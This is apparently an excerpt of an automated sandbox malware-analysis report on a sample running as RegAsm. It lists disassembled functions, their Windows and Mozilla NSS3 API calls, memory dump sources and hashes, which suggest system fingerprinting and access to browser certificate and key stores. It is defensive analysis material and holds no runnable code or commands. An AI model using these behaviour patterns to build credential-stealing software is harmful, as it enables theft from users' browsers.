                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410413
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041041E
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414DB8,?,00000000,?,Display Resolution: ,00000000,?,00426668,00000000,?), ref: 0041042A
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414DB8,?,00000000,?,Display Resolution: ,00000000,?,00426668,00000000,?,00000000), ref: 00410431
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410443
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                                  • String ID: %dx%d
                                                                                                                                                                                                                                                                  • API String ID: 3940144428-2206825331
                                                                                                                                                                                                                                                                  • Opcode ID: 26a84cc38fab63a7cba32148709c7622f8a609a76d3cfd754c8ba3cacaf6ba8d
                                                                                                                                                                                                                                                                  • Instruction ID: 524e9124d858e804018a0c07973ce36443d999801a53d347cad419b99993082b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26a84cc38fab63a7cba32148709c7622f8a609a76d3cfd754c8ba3cacaf6ba8d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DF0D13A601224BBD7106BA2EC0DEDF7E7DFF4BBA1B001025FA05A7150DB75494187B4
                                                                                                                                                                                                                                                                  Function 6C95CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C95CD08
                                                                                                                                                                                                                                                                  • PK11_DoesMechanism.NSS3(?,?), ref: 6C95CE16
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C95D079
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1351604052-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6de6311a579f46de05a6e335d77280263014ee410bc74b767d1f31bd4140fb9d
                                                                                                                                                                                                                                                                  • Instruction ID: ac293403935b42aad31ccf1ac4dd2c22d212e8b8223ec2ee4e07b6781262a498
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6de6311a579f46de05a6e335d77280263014ee410bc74b767d1f31bd4140fb9d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48C17FB5A002199BDB10DF24CC80BDAB7B8BF58318F5441A8E94CA7741E775EEA5CF90
                                                                                                                                                                                                                                                                  Function 6C94DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C9597C1,?,00000000,00000000,?,?,?,00000000,?,6C937F4A,00000000), ref: 6C94DC68
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DD36
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DE2D
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DE43
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DE76
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DF32
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DF5F
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DF78
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C937F4A,00000000,?,00000000,00000000), ref: 6C94DFAA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1886645929-0
                                                                                                                                                                                                                                                                  • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                                  • Instruction ID: 720f6d02cceac151aee2281f23f47d212c6701996fb73ae83d9591f8603ccdb9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6481F47B6066018BFF244E59C8A0B6B76DADB61748F20C43AD919CBFE1D775C8C4C612
                                                                                                                                                                                                                                                                  Function 6C923C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C923C76
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(00000000), ref: 6C923C94
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9195B0: TlsGetValue.KERNEL32(00000000,?,6C9300D2,00000000), ref: 6C9195D2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9195B0: EnterCriticalSection.KERNEL32(?,?,?,6C9300D2,00000000), ref: 6C9195E7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9195B0: PR_Unlock.NSS3(?,?,?,?,6C9300D2,00000000), ref: 6C919605
                                                                                                                                                                                                                                                                  • PORT_NewArena_Util.NSS3(00000800), ref: 6C923CB2
                                                                                                                                                                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C923CCA
                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C923CE1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C93AE42), ref: 6C9230AA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9230C7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C9230E5
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C923116
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C92312B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: PK11_DestroyObject.NSS3(?,?), ref: 6C923154
                                                                                                                                                                                                                                                                    • Part of subcall function 6C923090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C92317E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3167935723-0
                                                                                                                                                                                                                                                                  • Opcode ID: 668b1cc04f775aa82f00f94354f191c4c94d58f05955cff95df85d84db42d950
                                                                                                                                                                                                                                                                  • Instruction ID: 3f6d8022c5bccbeeec3d22a56e7366922719ce2404dd8791479064f37775c923
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 668b1cc04f775aa82f00f94354f191c4c94d58f05955cff95df85d84db42d950
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E61E871A00200ABEB109E75DC45FAB76BDFF24748F484028FE4A9AA56F735D818C7B0
                                                                                                                                                                                                                                                                  Function 6C912C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PORT_ZAlloc_Util.NSS3(BDDF04CF), ref: 6C912C5D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970D30: calloc.MOZGLUE ref: 6C970D50
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970D30: TlsGetValue.KERNEL32 ref: 6C970D6D
                                                                                                                                                                                                                                                                  • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C912C8D
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C912CE0
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C912CDA,?,00000000), ref: 6C912E1E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C912E33
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: TlsGetValue.KERNEL32 ref: 6C912E4E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: EnterCriticalSection.KERNEL32(?), ref: 6C912E5E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableLookup.NSS3(?), ref: 6C912E71
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableRemove.NSS3(?), ref: 6C912E84
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C912E96
                                                                                                                                                                                                                                                                    • Part of subcall function 6C912E00: PR_Unlock.NSS3 ref: 6C912EA9
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C912D23
                                                                                                                                                                                                                                                                  • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C912D30
                                                                                                                                                                                                                                                                  • CERT_MakeCANickname.NSS3(00000001), ref: 6C912D3F
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C912D73
                                                                                                                                                                                                                                                                  • CERT_DestroyCertificate.NSS3(?), ref: 6C912DB8
                                                                                                                                                                                                                                                                  • free.MOZGLUE ref: 6C912DC8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C913EC2
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C913ED6
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C913EEE
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C913F02
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: PL_FreeArenaPool.NSS3 ref: 6C913F14
                                                                                                                                                                                                                                                                    • Part of subcall function 6C913E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C913F27
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3941837925-0
                                                                                                                                                                                                                                                                  • Opcode ID: 23394742b1ddc3d8f0822e38784ed0dd63c1f938f99153aac0d1a5e9291d30d3
                                                                                                                                                                                                                                                                  • Instruction ID: 548fd1353db6b1ce2c53b5492ca9ef6042a47c869e22a28080b685b04bdbd353
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23394742b1ddc3d8f0822e38784ed0dd63c1f938f99153aac0d1a5e9291d30d3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F5103756187199BEB00EF25CC46B5B77E9EFA5308F15042CEC5583A50E731E815CB92
                                                                                                                                                                                                                                                                  Function 6C917CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9140D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C913F7F,?,00000055,?,?,6C911666,?,?), ref: 6C9140D9
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9140D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C911666,?,?), ref: 6C9140FC
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9140D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C911666,?,?), ref: 6C914138
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C917CFD
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BF0: TlsGetValue.KERNEL32(?,?,?,6CA20A75), ref: 6C9D9C07
                                                                                                                                                                                                                                                                  • SECITEM_ItemsAreEqual_Util.NSS3(?,6CA39030), ref: 6C917D1B
                                                                                                                                                                                                                                                                    • Part of subcall function 6C96FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C911A3E,00000048,00000054), ref: 6C96FD56
                                                                                                                                                                                                                                                                  • SECITEM_ItemsAreEqual_Util.NSS3(?,6CA39048), ref: 6C917D2F
                                                                                                                                                                                                                                                                  • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C917D50
                                                                                                                                                                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C917D61
                                                                                                                                                                                                                                                                  • PORT_ArenaMark_Util.NSS3(?), ref: 6C917D7D
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C917D9C
                                                                                                                                                                                                                                                                  • CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C917DB8
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C917E19
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 70581797-0
                                                                                                                                                                                                                                                                  • Opcode ID: f97d332bfecffe4ed54f2b15764c0cf6fe9308b76a6a0927f0919703b1985e71
                                                                                                                                                                                                                                                                  • Instruction ID: 33ab927498ec65fe201f8c685a91a43f56b97fc113d4c486119b2034184cdf73
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f97d332bfecffe4ed54f2b15764c0cf6fe9308b76a6a0927f0919703b1985e71
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9941E776A1411F9BEB009E79DC42BAF33E8AF6525CF050024EC19A7F50EB30E919C7A1
                                                                                                                                                                                                                                                                  Function 6C973CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C9738BD), ref: 6C973CBE
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C9738BD), ref: 6C973CD1
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: malloc.MOZGLUE(6C968D2D,?,00000000,?), ref: 6C970BF8
                                                                                                                                                                                                                                                                    • Part of subcall function 6C970BE0: TlsGetValue.KERNEL32(6C968D2D,?,00000000,?), ref: 6C970C15
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C9738BD), ref: 6C973CF0
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CA4B369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6C9738BD), ref: 6C973D0B
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6C9738BD), ref: 6C973D1A
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CA4B369,000000FF,00000000,00000000,00000000,6C9738BD), ref: 6C973D38
                                                                                                                                                                                                                                                                  • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6C973D47
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C973D62
                                                                                                                                                                                                                                                                  • free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6C9738BD), ref: 6C973D6F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2345246809-0
                                                                                                                                                                                                                                                                  • Opcode ID: e177edab6781f3cdc2d0fb33c52300de73694185a8f4ff6765c344044c725941
                                                                                                                                                                                                                                                                  • Instruction ID: e4caa542bd03d4d297f0e9176b9928eebed037f109b7e544fb283c174e696afd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e177edab6781f3cdc2d0fb33c52300de73694185a8f4ff6765c344044c725941
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC2192B57022127BFF30667B5C09E7B39ADEB826ACB140235B939D7AC0DB60C8018271
                                                                                                                                                                                                                                                                  Function 6C89FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C89FD7A
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89FD94
                                                                                                                                                                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C89FE3C
                                                                                                                                                                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C89FE83
                                                                                                                                                                                                                                                                    • Part of subcall function 6C89FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C89FEFA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C89FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C89FF3B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
